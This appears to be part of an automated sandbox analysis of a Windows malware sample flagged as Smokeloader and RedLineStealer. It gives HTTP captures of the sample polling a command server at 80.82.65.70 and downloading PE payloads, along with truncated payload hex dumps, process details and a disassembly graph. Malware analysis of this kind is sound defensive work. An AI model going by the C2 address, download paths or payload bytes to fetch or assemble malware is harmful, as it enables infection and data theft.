                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:28.213033915 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:28.700536013 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:28 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=96
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:30.744301081 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:31.235162973 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:30 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=95
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:33.259049892 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:33.747785091 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:33 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=94
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:35.774940014 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:36.258832932 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:35 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=93
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:38.290361881 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:38.786434889 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:38 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=92
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:40.821625948 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:41.311126947 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:41 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=91
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:43.339262009 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:43.836774111 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:43 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=90
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:45.869149923 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:46.354108095 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:46 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=89
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:48.384077072 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:48.892077923 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:48 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=88
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0
                                          Dec 13, 2024 06:12:50.930975914 CET393OUTGET /files/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: C
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:51.413856983 CET203INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:51 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Length: 1
                                          Keep-Alive: timeout=5, max=87
                                          Connection: Keep-Alive
                                          Content-Type: text/html; charset=UTF-8
                                          Data Raw: 30
                                          Data Ascii: 0


                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                          1192.168.2.54978680.82.65.70804308C:\Users\user\Desktop\file.exe
                                          TimestampBytes transferredDirectionData
                                          Dec 13, 2024 06:12:54.613821983 CET392OUTGET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: d
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:56.108979940 CET1236INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:55 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="dll";
                                          Content-Length: 242176
                                          Keep-Alive: timeout=5, max=100
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 4a 6c ef 58 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0b 00 00 a8 03 00 00 08 00 00 00 00 00 00 2e c6 03 00 00 20 00 00 00 e0 03 00 00 00 00 10 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 20 04 00 00 02 00 00 00 00 00 00 03 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 d4 c5 03 00 57 00 00 00 00 e0 03 00 10 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELJlX!. @W H.text4 `.rsrc@@.reloc@BH`4eU}Yy={Xx=rpo2o(3o2}*:s(**2rp(;&*Vrprp*(*>}*(Co(D(E}(F(E(G&*>}*(Co(D}(F(E(H&*"*>}*R} { oo*{ *"}!*{!*}{#{op{,{ oo*{!oo*{*Bsu
                                          Dec 13, 2024 06:12:56.109026909 CET1236INData Raw: 00 00 0a 28 76 00 00 0a 2a 8a 02 7b 23 00 00 04 02 7b 23 00 00 04 6f 77 00 00 0a 02 6f 78 00 00 0a 28 2b 00 00 06 6f 79 00 00 0a 2a a6 02 7b 1f 00 00 04 2c 0e 02 02 7b 20 00 00 04 6f 6f 00 00 0a 2b 0c 02 02 7b 21 00 00 04 6f 6f 00 00 0a 02 28 32
                                          Data Ascii: (v*{#{#owox(+oy*{,{ oo+{!oo(2*z,{",{"o/(z*((X[((X[((X[(q*~(-(-(***~to(3to*^(
                                          Dec 13, 2024 06:12:56.109062910 CET1236INData Raw: 0a 2a 1e 02 7b 52 00 00 04 2a 32 02 7b 63 00 00 04 6f f2 00 00 0a 2a 52 02 03 7d 55 00 00 04 02 7b 63 00 00 04 03 6f 6f 00 00 0a 2a 1e 02 7b 51 00 00 04 2a 22 02 03 7d 51 00 00 04 2a 32 02 7b 63 00 00 04 6f 77 00 00 0a 2a 7e 02 7b 63 00 00 04 03
                                          Data Ascii: *{R*2{co*R}U{coo*{Q*"}Q*2{cow*~{coy}]so*2{cos*N{cop(*2{dos*N{dop(*{V*R}Vs(*{W*R}Ws(*F{cot
                                          Dec 13, 2024 06:12:56.109215975 CET1236INData Raw: 02 03 7d 71 00 00 04 2a 1e 02 7b 72 00 00 04 2a 22 02 03 7d 72 00 00 04 2a 1e 02 28 30 01 00 0a 2a 1e 02 7b 73 00 00 04 2a 22 02 03 7d 73 00 00 04 2a 1e 02 7b 74 00 00 04 2a 22 02 03 7d 74 00 00 04 2a 1e 02 7b 75 00 00 04 2a 22 02 03 7d 75 00 00
                                          Data Ascii: }q*{r*"}r*(0*{s*"}s*{t*"}t*{u*"}u*N(((*(*z,{v,{vo/(*(5*"}x*N{o9o<&*{|*f}|{{|o*2{o?*{o9(
                                          Dec 13, 2024 06:12:56.109249115 CET1236INData Raw: 0a 02 02 fe 06 5d 01 00 06 73 89 00 00 0a 28 95 00 00 0a 02 16 28 97 00 00 0a 2a e6 02 72 a8 0f 00 70 7d 9f 00 00 04 02 72 a8 0f 00 70 7d a1 00 00 04 02 72 a8 0f 00 70 7d a2 00 00 04 02 72 a8 0f 00 70 7d a3 00 00 04 02 28 18 01 00 0a 02 28 81 01
                                          Data Ascii: ]s((*rp}rp}rp}rp}((*{*{*{*"}*{*"}*{*(dt%r2poeoftog*z,{,{o/(*rp}rp}sm}
                                          Dec 13, 2024 06:12:56.109283924 CET1236INData Raw: 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 1e 02 7b cd 00 00 04 2a 76 03 16 30 0b 72 10 16 00 70 73 41 01 00 0a 7a 02 03 7d cd 00 00 04 02 28 da 01 00 06 2a 1e 02 7b ce 00 00 04 2a 76 02 03 7d ce 00 00 04 02 28 db 00 00 0a 2c 07 02 03 7d d1 00 00
                                          Data Ascii: o/(z*{*v0rpsAz}(*{*v}(,}(*{*:}(*{*:}(*({o{ZX/{o{ZX((*J{ooo*J{oxo*2{
                                          Dec 13, 2024 06:12:56.109334946 CET1236INData Raw: 7d 03 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 04 01 00 04 2a 3a 02 03 7d 04 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 05 01 00 04 2a 3a 02 03 7d 05 01 00 04 02 28 6d 02 00 06 2a 1e 02 7b 06 01 00 04 2a 3a 02 03 7d 06 01 00 04 02 28 6d 02 00 06 2a 1e
                                          Data Ascii: }(m*{*:}(m*{*:}(m*{*:}(m*{*{*:}(m*{*:}(m*{*:}(m*{*:}(m*{*2{o*^{{oo*:}(m*:
                                          Dec 13, 2024 06:12:56.109369993 CET1236INData Raw: 02 7b 2b 01 00 04 03 6f 6f 00 00 0a 2a 32 02 7b 2b 01 00 04 6f f2 00 00 0a 2a 7a 03 2c 13 02 7b 2a 01 00 04 2c 0b 02 7b 2a 01 00 04 6f 2f 00 00 0a 02 03 28 7a 00 00 0a 2a 0a 16 2a 36 02 28 26 00 00 0a 02 28 dd 02 00 06 2a 52 02 28 26 00 00 0a 03
                                          Data Ascii: {+oo*2{+o*z,{*,{*o/(z**6(&(*R(&o(*z,{-,{-o/(*2s}-*}6{=ob-{=o\*rTp(;&*z,{<,{<o/(z*:{0ot*:{/ot
                                          Dec 13, 2024 06:12:56.109402895 CET1236INData Raw: 00 06 28 39 00 00 0a 2a 56 72 52 1d 00 70 72 96 1d 00 70 72 ac 1d 00 70 28 41 03 00 06 2a 56 72 a8 0f 00 70 80 5d 01 00 04 7e d8 01 00 0a 80 5e 01 00 04 2a 3e 02 fe 15 39 00 00 02 02 03 7d 5f 01 00 04 2a be 02 03 28 43 00 00 0a 04 d6 8c 6f 00 00
                                          Data Ascii: (9*VrRprprp(A*Vrp]~^*>9}_*(Co(D(E}_(F(E(&*>:}d*(Co(D}d(F(E(&*";*><}n*{u*"}u*{v*"}v*{w*"
                                          Dec 13, 2024 06:12:56.109437943 CET1236INData Raw: 01 00 04 2c 0e 02 7b 99 01 00 04 02 04 6f 23 02 00 0a 2a 04 17 6f 14 04 00 06 2a 8a 02 7b a6 01 00 04 03 6f 28 02 00 0a 2c 12 02 7b a6 01 00 04 03 6f 29 02 00 0a 6f 2c 04 00 06 2a 16 2a 2a 03 75 10 00 00 01 14 fe 03 2a 1e 02 7b aa 01 00 04 2a 22
                                          Data Ascii: ,{o#*o*{o(,{o)o,***u*{*"}*{*J{{(*F(uNoK*J(uNoL*F(uNoM*J(uNoN*{*"}*{*"}*{*"}*
                                          Dec 13, 2024 06:12:56.229480982 CET1236INData Raw: 0a 7d fa 01 00 04 2a 2e 73 6f 02 00 0a 80 fc 01 00 04 2a 1e 02 28 70 02 00 0a 2a 76 04 d0 65 00 00 01 28 7b 00 00 0a 28 07 01 00 0a 2c 02 17 2a 02 03 04 28 71 02 00 0a 2a 36 02 28 72 00 00 0a 02 28 8e 04 00 06 2a 32 73 8f 04 00 06 28 7a 02 00 0a
                                          Data Ascii: }*.so*(p*ve({(,*(q*6(r(*2s(z&*z,{5,{5o/(z*~}8s}9(5(*(}*2r p(;&*2r p(;&*J{9to*2{9o*z,{:,{:o/(T
                                          Dec 13, 2024 06:12:57.006952047 CET392OUTGET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: s
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:57.305341005 CET392OUTGET /soft/download HTTP/1.1
                                          Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
                                          Accept-Language: ru-RU,ru;q=0.9,en;q=0.8
                                          Accept-Charset: iso-8859-1, utf-8, utf-16, *;q=0.1
                                          Accept-Encoding: deflate, gzip, x-gzip, identity, *;q=0
                                          User-Agent: s
                                          Host: 80.82.65.70
                                          Connection: Keep-Alive
                                          Cache-Control: no-cache
                                          Dec 13, 2024 06:12:58.113756895 CET1236INHTTP/1.1 200 OK
                                          Date: Fri, 13 Dec 2024 05:12:57 GMT
                                          Server: Apache/2.4.58 (Ubuntu)
                                          Content-Disposition: attachment; filename="soft";
                                          Content-Length: 1502720
                                          Keep-Alive: timeout=5, max=99
                                          Connection: Keep-Alive
                                          Content-Type: application/octet-stream
                                          Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 5f d5 ce a0 00 00 00 00 00 00 00 00 e0 00 22 00 0b 01 30 00 00 30 14 00 00 bc 02 00 00 00 00 00 9e 4f 14 00 00 20 00 00 00 60 14 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 40 17 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 4c 4f 14 00 4f 00 00 00 00 60 14 00 f0 b9 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 17 00 0c 00 00 00 30 4f 14 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 [TRUNCATED]
                                          Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PEL_"00O `@ @`LOO` 0O H.text/ 0 `.rsrc`2@@.reloc @BOHh~DU (*(*~-rp(os~*~**j(r=p~ot*j(rMp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*j(rp~ot*~*(*Vs(t*N(((*0f(8Mo9:oo-a


                                          Statistics

                                          CPU Usage

                                          Click to jump to process

                                          Memory Usage

                                          Click to jump to process

                                          High Level Behavior Distribution

                                          Click to dive into process behavior distribution

                                          Behavior

                                          Click to jump to process

                                          System Behavior

                                          General

                                          Target ID:0
                                          Start time:00:11:58
                                          Start date:13/12/2024
                                          Path:C:\Users\user\Desktop\file.exe
                                          Wow64 process (32bit):true
                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                          Imagebase:0x400000
                                          File size:1'933'312 bytes
                                          MD5 hash:602574CE5A6EEA6388A2D30A490DDFA9
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Yara matches:
                                          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.2925508436.0000000004B30000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.2923697726.0000000000F0C000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                          Reputation:low
                                          Has exited:true

                                          General

                                          Target ID:6
                                          Start time:00:13:00
                                          Start date:13/12/2024
                                          Path:C:\Windows\SysWOW64\WerFault.exe
                                          Wow64 process (32bit):true
                                          Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 4308 -s 572
                                          Imagebase:0x320000
                                          File size:483'680 bytes
                                          MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Reputation:high
                                          Has exited:true

                                          Disassembly

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:4.1%
                                            Dynamic/Decrypted Code Coverage:11.3%
                                            Signature Coverage:56.4%
                                            Total number of Nodes:2000
                                            Total number of Limit Nodes:23
                                            execution_graph 40533 401940 40534 4019af InternetSetFilePointer InternetReadFile 40533->40534 40535 401a50 CallUnexpected 40534->40535 40536 401a7a HttpQueryInfoA 40535->40536 40537 401aa3 CoCreateInstance 40536->40537 40538 401dea 40536->40538 40537->40538 40541 401adc 40537->40541 40602 4099d7 40538->40602 40540 401e13 40541->40538 40566 402730 40541->40566 40543 401b2c 40544 401c05 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40543->40544 40545 401e19 40543->40545 40553 401d8c __InternalCxxFrameHandler 40544->40553 40582 409b4a 40544->40582 40609 40cfaf 40545->40609 40549 401c3b 40550 409b4a 41 API calls 40549->40550 40549->40553 40554 401cf3 __InternalCxxFrameHandler 40549->40554 40556 401cc7 CallUnexpected 40550->40556 40551 401d7b 40599 40d09d 14 API calls __dosmaperr 40551->40599 40553->40538 40554->40551 40554->40553 40557 401d88 CallUnexpected 40554->40557 40555 401d80 40601 40cf9f 39 API calls ___std_exception_copy 40555->40601 40556->40554 40560 401d2c 40556->40560 40561 401d1f 40556->40561 40557->40553 40600 40d09d 14 API calls __dosmaperr 40557->40600 40560->40554 40597 40d09d 14 API calls __dosmaperr 40560->40597 40596 40d09d 14 API calls __dosmaperr 40561->40596 40563 401d24 40598 40cf9f 39 API calls ___std_exception_copy 40563->40598 40567 402800 40566->40567 40569 40274f 40566->40569 40616 4015d0 43 API calls 3 library calls 40567->40616 40570 40275b __InternalCxxFrameHandler 40569->40570 40571 402783 40569->40571 40574 4027c7 40569->40574 40575 4027be 40569->40575 40570->40543 40614 401530 41 API calls 4 library calls 40571->40614 40572 402805 40617 401530 41 API calls 3 library calls 40572->40617 40581 40279f __InternalCxxFrameHandler 40574->40581 40615 401530 41 API calls 4 library calls 40574->40615 40575->40571 40575->40572 40577 402796 40578 40cfaf 39 API calls 40577->40578 40577->40581 40580 40280f 40578->40580 40581->40543 40584 409b0c 40582->40584 40585 409b2b 40584->40585 40587 409b2d 40584->40587 40620 411672 EnterCriticalSection LeaveCriticalSection _unexpected 40584->40620 40621 40fb0d 40584->40621 40585->40549 40588 401530 Concurrency::cancel_current_task 40587->40588 40590 409b37 40587->40590 40618 40af40 RaiseException 40588->40618 40628 40af40 RaiseException 40590->40628 40591 40154c 40619 40acf1 40 API calls ___std_exception_copy 40591->40619 40594 40a549 40595 401573 40595->40549 40596->40563 40597->40563 40598->40554 40599->40555 40600->40555 40601->40553 40603 4099e0 IsProcessorFeaturePresent 40602->40603 40604 4099df 40602->40604 40606 409a27 40603->40606 40604->40540 40631 4099ea SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 40606->40631 40608 409b0a 40608->40540 40632 40ceeb 39 API calls ___std_exception_copy 40609->40632 40611 40cfbe 40633 40cfcc 11 API calls CallUnexpected 40611->40633 40613 40cfcb 40614->40577 40615->40581 40616->40572 40617->40577 40618->40591 40619->40595 40620->40584 40627 413c79 _unexpected 40621->40627 40622 413cb7 40630 40d09d 14 API calls __dosmaperr 40622->40630 40624 413ca2 RtlAllocateHeap 40625 413cb5 40624->40625 40624->40627 40625->40584 40627->40622 40627->40624 40629 411672 EnterCriticalSection LeaveCriticalSection _unexpected 40627->40629 40628->40594 40629->40627 40630->40625 40631->40608 40632->40611 40633->40613 40634 40a071 40635 40a07d ___scrt_is_nonwritable_in_current_image 40634->40635 40662 409dd1 40635->40662 40637 40a084 40638 40a1d7 40637->40638 40650 40a0ae ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock CallUnexpected 40637->40650 40690 40a54a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter CallUnexpected 40638->40690 40640 40a1de 40691 41066b 40640->40691 40644 40a1ec 40645 40a0cd 40646 40a14e 40670 40a665 40646->40670 40650->40645 40650->40646 40686 410645 39 API calls 3 library calls 40650->40686 40663 409dda 40662->40663 40695 40a2ac IsProcessorFeaturePresent 40663->40695 40665 409de6 40696 40b73d 10 API calls 2 library calls 40665->40696 40667 409deb 40668 409def 40667->40668 40697 40b75c 7 API calls 2 library calls 40667->40697 40668->40637 40698 40b530 40670->40698 40673 40a154 40674 412248 40673->40674 40700 41812d 40674->40700 40676 412251 40678 40a15c 40676->40678 40706 4183dd 39 API calls 40676->40706 40679 408770 40678->40679 40680 402730 43 API calls 40679->40680 40681 4087a5 40680->40681 40682 402730 43 API calls 40681->40682 40683 4087ca 40682->40683 40709 405a30 40683->40709 40686->40646 40690->40640 43189 41049f 40691->43189 40694 41062f 21 API calls CallUnexpected 40694->40644 40695->40665 40696->40667 40697->40668 40699 40a678 GetStartupInfoW 40698->40699 40699->40673 40701 418168 40700->40701 40702 418136 40700->40702 40701->40676 40707 41295d 39 API calls 3 library calls 40702->40707 40704 418159 40708 417f38 49 API calls 3 library calls 40704->40708 40706->40676 40707->40704 40708->40701 41140 4107e2 GetSystemTimeAsFileTime 40709->41140 40711 405a7f 41142 4106a2 40711->41142 40714 402730 43 API calls 40718 405aba 40714->40718 40715 402730 43 API calls 40744 405c80 __InternalCxxFrameHandler CallUnexpected std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40715->40744 40716 405bc6 __InternalCxxFrameHandler std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40716->40715 40716->40744 40718->40716 42306 4025a0 41 API calls 40718->42306 40722 409b4a 41 API calls 40722->40744 40723 4061c5 41161 406c20 40723->41161 40725 4061ec 41171 402430 40725->41171 40727 402730 43 API calls 40727->40744 40730 4061fc 41175 402360 40730->41175 40734 406210 40735 4062e5 40734->40735 40736 406218 40734->40736 42344 406ec0 53 API calls 2 library calls 40735->42344 40741 406288 40736->40741 40742 40622b 40736->40742 40739 40cfaf 39 API calls 40739->40744 40740 4062ea 40748 402430 43 API calls 40740->40748 42339 406db0 53 API calls 2 library calls 40741->42339 42334 406ca0 53 API calls 2 library calls 40742->42334 40743 406192 Sleep 40743->40744 40744->40722 40744->40723 40744->40727 40744->40739 40744->40743 40756 40619e 40744->40756 40763 406188 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 40744->40763 40767 406c0b 40744->40767 41145 4107b2 40744->41145 41149 403a90 40744->41149 42307 4025a0 41 API calls 40744->42307 42308 409c85 6 API calls 40744->42308 42309 